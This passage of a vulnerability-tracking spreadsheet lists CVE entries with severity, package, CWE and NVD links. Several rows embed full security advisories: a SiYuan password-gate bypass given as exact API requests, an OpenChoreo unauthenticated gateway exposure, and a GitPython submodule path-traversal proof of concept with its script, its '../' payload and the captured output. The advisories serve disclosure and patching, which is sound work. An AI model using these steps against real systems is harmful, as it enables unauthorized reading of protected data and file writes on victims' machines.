**The chain, reproduced on a live instance.** Against a real protected document (password set), an anonymous reader on port 6808 with no token and no password:

1. `getDoc(protectedDoc)` → returns the password-required placeholder (correctly blocked).
2. `searchEmbedBlock` with a statement selecting heading blocks for the document's root ID → returns the heading IDs (content filtered, IDs retained).
3. `getHeadingChildrenDOM(headingId)` → returns the full rendered body of the protected document, including its protected content.

The password gate that step 1 enforces is entirely bypassed by step 3.

### Proof of Concept

Reproduced on a local instance (SiYuan running locally, publish mode enabled on port 6808, publish Basic Auth disabled). Setup: a document marked "protected" with password, whose body contains the unique marker `TOP_SECRET_CRITICAL_123`.

**1. Confirm the password gate blocks the primary path (anonymous, port 6808):**
```
POST http://127.0.0.1:6808/api/filetree/getDoc
{"id":"PROTECTED_DOC"}
```
Returns the password-required placeholder correctly blocked.

**2. Leak the protected document's heading ID (anonymous, port 6808):**
```
POST http://127.0.0.1:6808/api/search/searchEmbedBlock
{"stmt":"SELECT * FROM blocks WHERE root_id='PROTECTED_DOC' AND type='h'"}
```
Returns heading blocks with their IDs; the content field is filtered but the block ID is retained.

**3. Retrieve the protected content without the password (anonymous, port 6808):**
```
POST http://127.0.0.1:6808/api/block/getHeadingChildrenDOM
{"id":"HEADING_ID"}
```
Returns HTTP 200 with the rendered body of the protected document, including `TOP_SECRET_CRITICAL_123` retrieved with no token and no password.

`getHeadingDeleteTransaction`/`getHeadingLevelTransaction`/`getHeadingInsertTransaction` and `getBacklinkDoc`/ `getBackmentionDoc` provide the same password-free content retrieval given a block ID from the protected document.

### Impact

An anonymous reader (publish mode with auth disabled) or any publish `RoleReader` can read the full content of a password-protected published document without the password, defeating the "protected" access control the product documents as a password gate. The core defect is that these content-returning endpoints perform no publish-password check; the ID-leak endpoints (multiple sources) supply the block IDs that make the bypass reachable anonymously and untargeted. Impact is confidentiality-only (content disclosure); no modification occurs on these paths. Encrypted notebooks are out of scope.

### Suggested fix

Apply the publish-password/publish-access check that `getDoc` uses (`FilterContentByPublishAccess`/`IsReadOnlyRoleContext` plus the password-cookie check) to every content-returning endpoint: `getHeadingChildrenDOM`, the three `getHeading*Transaction` handlers, and `getBacklinkDoc`/`getBackmentionDoc`. Separately, `FilterEmbedBlocksByPublishAccess` should omit filtered blocks entirely rather than blanking the content while retaining the ID, so that filtered results cannot be used to enumerate a protected document's internal block IDs. The durable fix is to enforce the publish boundary in the shared render/DOM path rather than per-handler, since any content endpoint that omits the check reintroduces this class.</t></is></c><c r="S2375" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68584</t></is></c></row><row r="2376"><c r="A2376" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2376" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2376" s="5" t="inlineStr"><is><t>CVE-2026-69222</t></is></c><c r="D2376" s="5" t="inlineStr" /><c r="E2376" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2376" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2376" s="5" t="inlineStr" /><c r="H2376" s="5" t="n"><v>0.004</v></c><c r="I2376" s="5" t="inlineStr" /><c r="J2376" s="5" t="inlineStr" /><c r="K2376" s="5" t="inlineStr" /><c r="L2376" s="5" t="inlineStr"><is><t>npm:liquidjs</t></is></c><c r="M2376" s="5" t="inlineStr"><is><t>10.27.2</t></is></c><c r="N2376" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2376" s="5" t="inlineStr" /><c r="P2376" s="5" t="inlineStr" /><c r="Q2376" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R2376"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S2376" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t></is></c></row><row r="2377"><c r="A2377" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2377" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2377" s="5" t="inlineStr"><is><t>CVE-2026-70613</t></is></c><c r="D2377" s="5" t="inlineStr" /><c r="E2377" s="5" t="inlineStr" /><c r="F2377" s="5" t="inlineStr" /><c r="G2377" s="5" t="inlineStr" /><c r="H2377" s="5" t="inlineStr" /><c r="I2377" s="5" t="inlineStr" /><c r="J2377" s="5" t="inlineStr" /><c r="K2377" s="5" t="inlineStr" /><c r="L2377" s="5" t="inlineStr" /><c r="M2377" s="5" t="inlineStr" /><c r="N2377" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2377" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2377" s="5" t="inlineStr" /><c r="Q2377" s="5" t="inlineStr" /><c r="R2377" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="S2377" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70613</t></is></c></row><row r="2378"><c r="A2378" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2378" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2378" s="5" t="inlineStr"><is><t>CVE-2026-70614</t></is></c><c r="D2378" s="5" t="inlineStr" /><c r="E2378" s="5" t="inlineStr" /><c r="F2378" s="5" t="inlineStr" /><c r="G2378" s="5" t="inlineStr" /><c r="H2378" s="5" t="inlineStr" /><c r="I2378" s="5" t="inlineStr" /><c r="J2378" s="5" t="inlineStr" /><c r="K2378" s="5" t="inlineStr" /><c r="L2378" s="5" t="inlineStr" /><c r="M2378" s="5" t="inlineStr" /><c r="N2378" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2378" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2378" s="5" t="inlineStr" /><c r="Q2378" s="5" t="inlineStr" /><c r="R2378" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="S2378" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70614</t></is></c></row><row r="2379"><c r="A2379" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2379" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2379" s="5" t="inlineStr"><is><t>CVE-2026-72789</t></is></c><c r="D2379" s="5" t="inlineStr" /><c r="E2379" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2379" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2379" s="5" t="inlineStr" /><c r="H2379" s="5" t="n"><v>0.003</v></c><c r="I2379" s="5" t="inlineStr" /><c r="J2379" s="5" t="inlineStr" /><c r="K2379" s="5" t="inlineStr" /><c r="L2379" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M2379" s="5" t="inlineStr"><is><t>0.0.0-20260726020813-a25c2dd06aae</t></is></c><c r="N2379" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2379" s="5" t="inlineStr" /><c r="P2379" s="5" t="inlineStr" /><c r="Q2379" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2379"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S2379" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72789</t></is></c></row><row r="2380"><c r="A2380" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2380" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2380" s="5" t="inlineStr"><is><t>CVE-2026-72790</t></is></c><c r="D2380" s="5" t="inlineStr" /><c r="E2380" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2380" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2380" s="5" t="inlineStr" /><c r="H2380" s="5" t="n"><v>0.002</v></c><c r="I2380" s="5" t="inlineStr" /><c r="J2380" s="5" t="inlineStr" /><c r="K2380" s="5" t="inlineStr" /><c r="L2380" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M2380" s="5" t="inlineStr"><is><t>0.0.0-20260726005141-9edb321eb451</t></is></c><c r="N2380" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2380" s="5" t="inlineStr" /><c r="P2380" s="5" t="inlineStr" /><c r="Q2380" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2380"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S2380" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72790</t></is></c></row><row r="2381"><c r="A2381" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2381" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2381" s="5" t="inlineStr"><is><t>CVE-2026-72925</t></is></c><c r="D2381" s="5" t="inlineStr" /><c r="E2381" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2381" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2381" s="5" t="inlineStr" /><c r="H2381" s="5" t="n"><v>0.002</v></c><c r="I2381" s="5" t="inlineStr" /><c r="J2381" s="5" t="inlineStr" /><c r="K2381" s="5" t="inlineStr" /><c r="L2381" s="5" t="inlineStr"><is><t>npm:@swc/html, rust:swc_html_minifier</t></is></c><c r="M2381" s="5" t="inlineStr"><is><t>1.15.47-nightly-20260729.1, 59.0.0</t></is></c><c r="N2381" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2381" s="5" t="inlineStr" /><c r="P2381" s="5" t="inlineStr" /><c r="Q2381" s="5" t="inlineStr"><is><t>CWE-79, CWE-116</t></is></c><c r="R2381"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S2381" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72925</t></is></c></row><row r="2382"><c r="A2382" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2382" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2382" s="5" t="inlineStr"><is><t>CVE-2026-73262</t></is></c><c r="D2382" s="5" t="inlineStr" /><c r="E2382" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2382" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2382" s="5" t="inlineStr" /><c r="H2382" s="5" t="n"><v>0.002</v></c><c r="I2382" s="5" t="inlineStr" /><c r="J2382" s="5" t="inlineStr" /><c r="K2382" s="5" t="inlineStr" /><c r="L2382" s="5" t="inlineStr"><is><t>pip:prowler, pip:prowler-cloud</t></is></c><c r="M2382" s="5" t="inlineStr"><is><t>5.37.0</t></is></c><c r="N2382" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2382" s="5" t="inlineStr" /><c r="P2382" s="5" t="inlineStr" /><c r="Q2382" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2382"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S2382" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73262</t></is></c></row><row r="2383"><c r="A2383" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2383" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2383" s="5" t="inlineStr"><is><t>CVE-2026-73294</t></is></c><c r="D2383" s="5" t="inlineStr" /><c r="E2383" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2383" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2383" s="5" t="inlineStr" /><c r="H2383" s="5" t="n"><v>0.006</v></c><c r="I2383" s="5" t="inlineStr" /><c r="J2383" s="5" t="inlineStr" /><c r="K2383" s="5" t="inlineStr" /><c r="L2383" s="5" t="inlineStr"><is><t>go:github.com/semaphoreui/semaphore</t></is></c><c r="M2383" s="5" t="inlineStr"><is><t>0.0.0-20260704181911-7e8a9434bd81</t></is></c><c r="N2383" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2383" s="5" t="inlineStr" /><c r="P2383" s="5" t="inlineStr" /><c r="Q2383" s="5" t="inlineStr"><is><t>CWE-78, CWE-88</t></is></c><c r="R2383"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S2383" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t></is></c></row><row r="2384"><c r="A2384" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2384" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2384" s="5" t="inlineStr"><is><t>CVE-2026-73558</t></is></c><c r="D2384" s="5" t="inlineStr" /><c r="E2384" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2384" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2384" s="5" t="inlineStr" /><c r="H2384" s="5" t="n"><v>0.003</v></c><c r="I2384" s="5" t="inlineStr" /><c r="J2384" s="5" t="inlineStr" /><c r="K2384" s="5" t="inlineStr" /><c r="L2384" s="5" t="inlineStr"><is><t>pip:vllm</t></is></c><c r="M2384" s="5" t="inlineStr"><is><t>0.27.0</t></is></c><c r="N2384" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2384" s="5" t="inlineStr" /><c r="P2384" s="5" t="inlineStr" /><c r="Q2384" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R2384"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S2384" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73558</t></is></c></row><row r="2385"><c r="A2385" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2385" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2385" s="5" t="inlineStr"><is><t>CVE-2026-73560</t></is></c><c r="D2385" s="5" t="inlineStr" /><c r="E2385" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2385" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2385" s="5" t="inlineStr" /><c r="H2385" s="5" t="n"><v>0.003</v></c><c r="I2385" s="5" t="inlineStr" /><c r="J2385" s="5" t="inlineStr" /><c r="K2385" s="5" t="inlineStr" /><c r="L2385" s="5" t="inlineStr"><is><t>pip:vllm</t></is></c><c r="M2385" s="5" t="inlineStr"><is><t>0.26.0</t></is></c><c r="N2385" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2385" s="5" t="inlineStr" /><c r="P2385" s="5" t="inlineStr" /><c r="Q2385" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R2385"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S2385" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73560</t></is></c></row><row r="2386"><c r="A2386" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2386" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2386" s="5" t="inlineStr"><is><t>CVE-2026-73843</t></is></c><c r="D2386" s="5" t="inlineStr" /><c r="E2386" s="5" t="inlineStr" /><c r="F2386" s="5" t="inlineStr" /><c r="G2386" s="5" t="inlineStr" /><c r="H2386" s="5" t="n"><v>0.003</v></c><c r="I2386" s="5" t="inlineStr" /><c r="J2386" s="5" t="inlineStr" /><c r="K2386" s="5" t="inlineStr" /><c r="L2386" s="5" t="inlineStr"><is><t>go:github.com/openchoreo/openchoreo</t></is></c><c r="M2386" s="5" t="inlineStr"><is><t>1.0.2, 1.1.2</t></is></c><c r="N2386" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2386" s="5" t="inlineStr" /><c r="P2386" s="5" t="inlineStr" /><c r="Q2386" s="5" t="inlineStr"><is><t>CWE-306, CWE-668, CWE-862</t></is></c><c r="R2386" s="5" t="inlineStr"><is><t>### Summary
The OpenChoreo control-plane **cluster-gateway** served its caller-facing management APIs on the same network listener that accepts data-plane agent connections. In the multi-cluster topology that listener is published outside the cluster, and the management APIs did not authenticate the calling client. A party able to reach the listener could therefore invoke privileged data-plane operations without authenticating and without passing through the OpenChoreo API server's authorization.

### Impact
An attacker who can reach the externally published cluster-gateway endpoint can perform data-plane operations normally restricted to the OpenChoreo API server and gated by its authorization — including proxying the data plane's Kubernetes API and executing commands inside workload pods. This can result in full compromise of workloads on the affected data plane (disclosure, tampering, and denial of service).

The exposure applies to the multi-cluster / remote data-plane topology, where the cluster-gateway is published outside the cluster so remote data-plane agents can connect. That same externally reachable listener also served the caller-facing management APIs, which did not authenticate the caller. Deployments that do not publish the cluster-gateway outside the cluster are not affected.

### Patches
Fixed in **1.0.2**, **1.1.2**, and **1.2.0**. The fix moves the caller-facing management APIs onto a separate internal listener that is not published outside the cluster, leaving only the agent-connection endpoint on the externally reachable listener. Upgrading is non-disruptive — no data-plane agent or configuration changes are required beyond the standard chart upgrade. Upgrade path: 1.1.x → 1.1.2, 1.0.x and earlier → 1.0.2, 1.2 line → 1.2.0.

### Workarounds
If you cannot upgrade immediately:
- If you do run remote data planes, restrict reachability of the external gateway endpoint to known data-plane source addresses only (firewall / gateway-level allowlisting).</t></is></c><c r="S2386" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73843</t></is></c></row><row r="2387"><c r="A2387" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2387" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2387" s="5" t="inlineStr"><is><t>CVE-2026-75604</t></is></c><c r="D2387" s="5" t="inlineStr" /><c r="E2387" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2387" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2387" s="5" t="inlineStr" /><c r="H2387" s="5" t="n"><v>0.025</v></c><c r="I2387" s="5" t="inlineStr" /><c r="J2387" s="5" t="inlineStr" /><c r="K2387" s="5" t="inlineStr" /><c r="L2387" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M2387" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N2387" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2387" s="5" t="inlineStr" /><c r="P2387" s="5" t="inlineStr" /><c r="Q2387" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R2387"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S2387" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t></is></c></row><row r="2388"><c r="A2388" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2388" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2388" s="5" t="inlineStr"><is><t>CVE-2026-76217</t></is></c><c r="D2388" s="5" t="inlineStr" /><c r="E2388" s="5" t="inlineStr" /><c r="F2388" s="5" t="inlineStr" /><c r="G2388" s="5" t="inlineStr" /><c r="H2388" s="5" t="n"><v>0.004</v></c><c r="I2388" s="5" t="inlineStr" /><c r="J2388" s="5" t="inlineStr" /><c r="K2388" s="5" t="inlineStr" /><c r="L2388" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M2388" s="5" t="inlineStr"><is><t>3.1.58</t></is></c><c r="N2388" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2388" s="5" t="inlineStr" /><c r="P2388" s="5" t="inlineStr" /><c r="Q2388" s="5" t="inlineStr"><is><t>CWE-73, CWE-200</t></is></c><c r="R2388" s="5" t="inlineStr"><is><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is></c><c r="S2388" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76217</t></is></c></row><row r="2389"><c r="A2389" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2389" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2389" s="5" t="inlineStr"><is><t>CVE-2026-76218</t></is></c><c r="D2389" s="5" t="inlineStr" /><c r="E2389" s="5" t="inlineStr" /><c r="F2389" s="5" t="inlineStr" /><c r="G2389" s="5" t="inlineStr" /><c r="H2389" s="5" t="n"><v>0.007</v></c><c r="I2389" s="5" t="inlineStr" /><c r="J2389" s="5" t="inlineStr" /><c r="K2389" s="5" t="inlineStr" /><c r="L2389" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M2389" s="5" t="inlineStr"><is><t>3.1.58</t></is></c><c r="N2389" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2389" s="5" t="inlineStr" /><c r="P2389" s="5" t="inlineStr" /><c r="Q2389" s="5" t="inlineStr"><is><t>CWE-88, CWE-94</t></is></c><c r="R2389" s="5" t="inlineStr"><is><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is></c><c r="S2389" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76218</t></is></c></row><row r="2390"><c r="A2390" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2390" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2390" s="5" t="inlineStr"><is><t>CVE-2026-76219</t></is></c><c r="D2390" s="5" t="inlineStr" /><c r="E2390" s="5" t="inlineStr" /><c r="F2390" s="5" t="inlineStr" /><c r="G2390" s="5" t="inlineStr" /><c r="H2390" s="5" t="n"><v>0.003</v></c><c r="I2390" s="5" t="inlineStr" /><c r="J2390" s="5" t="inlineStr" /><c r="K2390" s="5" t="inlineStr" /><c r="L2390" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M2390" s="5" t="inlineStr"><is><t>3.1.58</t></is></c><c r="N2390" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2390" s="5" t="inlineStr" /><c r="P2390" s="5" t="inlineStr" /><c r="Q2390" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R2390" s="5" t="inlineStr"><is><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is></c><c r="S2390" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76219</t></is></c></row><row r="2391"><c r="A2391" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2391" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2391" s="5" t="inlineStr"><is><t>CVE-2026-76220</t></is></c><c r="D2391" s="5" t="inlineStr" /><c r="E2391" s="5" t="inlineStr" /><c r="F2391" s="5" t="inlineStr" /><c r="G2391" s="5" t="inlineStr" /><c r="H2391" s="5" t="n"><v>0.006</v></c><c r="I2391" s="5" t="inlineStr" /><c r="J2391" s="5" t="inlineStr" /><c r="K2391" s="5" t="inlineStr" /><c r="L2391" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M2391" s="5" t="inlineStr"><is><t>3.1.58</t></is></c><c r="N2391" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2391" s="5" t="inlineStr" /><c r="P2391" s="5" t="inlineStr" /><c r="Q2391" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R2391" s="5" t="inlineStr"><is><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is></c><c r="S2391" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76220</t></is></c></row><row r="2392"><c r="A2392" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2392" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2392" s="5" t="inlineStr"><is><t>CVE-2026-76222</t></is></c><c r="D2392" s="5" t="inlineStr" /><c r="E2392" s="5" t="inlineStr" /><c r="F2392" s="5" t="inlineStr" /><c r="G2392" s="5" t="inlineStr" /><c r="H2392" s="5" t="n"><v>0.003</v></c><c r="I2392" s="5" t="inlineStr" /><c r="J2392" s="5" t="inlineStr" /><c r="K2392" s="5" t="inlineStr" /><c r="L2392" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M2392" s="5" t="inlineStr"><is><t>3.1.58</t></is></c><c r="N2392" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2392" s="5" t="inlineStr" /><c r="P2392" s="5" t="inlineStr" /><c r="Q2392" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="R2392" s="5" t="inlineStr"><is><t>### Summary
GitPython computes the on-disk location of a submodule's separate Git directory (`.git/modules/&lt;name&gt;`) from the submodule's `.gitmodules` section name with no validation. Because that name is fully attacker-controlled content of a cloned repository, a malicious repository can set a submodule name to a traversal string (e.g. `../../../../home/victim/.something`) and cause GitPython to create and initialize a full Git repository at an attacker-chosen filesystem path outside the intended clone directory. The only precondition is that a victim clones the malicious repository with GitPython and runs submodule initialization (`submodule_update(init=True)` / `sm.update(init=True)`), a very common and often automatic step. Core Git itself already blocks this exact attack class (CVE-2018-11235), but GitPython's independent reimplementation never adopted an equivalent check.

### Details
`src/GitPython/git/objects/submodule/util.py` `sm_name()` strips the `submodule "` / `"` wrapper from a `.gitmodules` `[submodule "..."]` header and returns the result unchecked. `Submodule.iter_items()` in `src/GitPython/git/objects/submodule/base.py` reads this via `sm_name(sms)` and assigns it to `sm._name`; unlike the submodule `path`, `name` is never used for a tree lookup, so it is never implicitly validated. `Submodule._module_abspath()` then builds `osp.join(parent_repo.git_dir, "modules", name)` - `os.path.join` does not normalize `../` sequences. `Submodule._clone_repo()` passes this value straight to `os.makedirs()` and to `git clone --separate-git-dir=&lt;module_abspath&gt;`, creating and populating a full Git repository (objects, refs, hooks, config) at the escaped path. Attack prerequisite: attacker controls a repository the victim clones and initializes submodules for.

### PoC
1. Environment: Docker image built `FROM python:3.11-slim`, with `git` installed via `apt-get install -y git` (Debian bookworm packaged version, described in the advisory as "git 2.x"; the host-side verification separately used system git `2.34.1`, but no exact version is pinned for the git binary inside this Docker image). GitPython is installed inside the container via `pip install /src/GitPython` from this repository's own source, which the advisory states resolved to the officially released `GitPython==3.1.57` and `gitdb==4.0.12`.
2. Configuration / preconditions: None beyond what's described - the victim must clone the attacker's repository with GitPython and run submodule initialization (`repo.submodules` + `sm.update(init=True)`, equivalent to `git submodule update --init`).
3. Commands run (quoted verbatim from the advisory's "Confirmed test run" section):
```bash
$ docker build -f GHSA/testing/Dockerfile -t ghsa-gitpython-poc .
$ docker run --rm ghsa-gitpython-poc
```
(Per the Dockerfile, `docker run` executes `/work/run_all.sh`, which in turn runs `build_attacker_repo.sh`, then `poc_gitpython.py`, then `poc_control_realgit.sh`.)
4. Full source of the PoC script (`GHSA/testing/poc_gitpython.py`), verbatim:
```python
"""GHSA-001 PoC: GitPython side.

Clones the attacker repo and runs the equivalent of
`git submodule update --init` via GitPython, then checks whether a git
repository was created outside the clone directory.
"""
import os
import shutil

import git

CLONE_DIR = '/work/victim_clone/repo'
ESCAPE_TARGET = '/tmp/gitpython_poc_escaped_root'


def main():
    shutil.rmtree(os.path.dirname(CLONE_DIR), ignore_errors=True)
    shutil.rmtree(ESCAPE_TARGET, ignore_errors=True)
    os.makedirs(os.path.dirname(CLONE_DIR), exist_ok=True)

    print(f'GitPython version: {git.__version__}')
    repo = git.Repo.clone_from('/work/attacker_repo', CLONE_DIR)
    print('Cloned into:', repo.working_tree_dir)

    sms = list(repo.submodules)
    for sm in sms:
        print('  submodule name:', repr(sm.name))
        print('  submodule path:', repr(sm.path))

    print('escape_target exists before update:', os.path.exists(ESCAPE_TARGET))

    for sm in sms:
        try:
            sm.update(init=True)
        except Exception as e:
            print('sm.update raised:', repr(e))

    exists = os.path.exists(ESCAPE_TARGET)
    print('escape_target exists after update:', exists)
    if exists:
        print('escape_target contents:', os.listdir(ESCAPE_TARGET))

    print('POC_RESULT=VULNERABLE' if exists else 'POC_RESULT=SAFE')


if __name__ == '__main__':
    main()
```
5. Exact captured terminal output (verbatim, from the original advisory's "Confirmed test run (Docker, released package)" section):
```
=== GitPython PoC (vulnerable path) ===
GitPython version: 3.1.57
Cloned into: /work/victim_clone/repo
  submodule name: '../../../../../../tmp/gitpython_poc_escaped_root/modules_dir'
  submodule path: 'legit_dir'
escape_target exists before update: False
escape_target exists after update: True
escape_target contents: ['modules_dir']
POC_RESULT=VULNERABLE

=== Control: real git CLI on identical repo ===
warning: ignoring suspicious submodule name: ../../../../../../tmp/gitpython_poc_escaped_root/modules_dir
warning: ignoring suspicious submodule name: ../../../../../../tmp/gitpython_poc_escaped_root/modules_dir
fatal: No url found for submodule path 'legit_dir' in .gitmodules
CONTROL_RESULT=SAFE (real git correctly refused)
```
6. Payload: the attacker rewrites the `.gitmodules` section header from `[submodule "legit_dir"]` to `[submodule "../../../../../../tmp/gitpython_poc_escaped_root/modules_dir"]` (built by `build_attacker_repo.sh`, part of the harness in `GHSA/testing/`). The malicious part is the `../../../../../../` traversal sequence embedded in the submodule *name* (not the tree-validated `path`), which becomes the on-disk target for the submodule's separate git directory.
7. Expected vs. observed: A safe implementation (as demonstrated by the real `git` CLI control run) rejects the submodule name with "ignoring suspicious submodule name" and refuses to create anything outside the repository. GitPython instead created the escape-target directory and a fully-initialized Git repository at `/tmp/gitpython_poc_escaped_root/modules_dir`, confirmed by `escape_target exists after update: True` and its listed contents.
8. Security impact demonstrated: arbitrary filesystem directory and Git-repository creation at an attacker-chosen absolute path outside the victim's intended clone directory, populated with attacker-controlled content sourced from the submodule's own (also attacker-controlled) `url`.

### Impact
Path traversal (CWE-22) / external control of file path (CWE-73) leading to arbitrary directory and Git-repository creation outside the intended clone directory. Integrity impact is High (attacker chooses destination path and, via the submodule URL, much of the written content); Confidentiality impact is None (only creation was demonstrated); Availability impact is Low-Medium (disk-exhaustion potential). No authentication is required; the attacker only needs to control a repository the victim clones and initializes submodules for - a routine, often fully-automatic operation in CI pipelines, IDE integrations, and dependency-management tooling.</t></is></c><c r="S2392" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76222</t></is></c></row><row r="2393"><c r="A2393" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2393" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2393" s="5" t="inlineStr"><is><t>CVE-2026-77037</t></is></c><c r="D2393" s="5" t="inlineStr" /><c r="E2393" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2393" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2393" s="5" t="inlineStr" /><c r="H2393" s="5" t="n"><v>0.003</v></c><c r="I2393" s="5" t="inlineStr" /><c 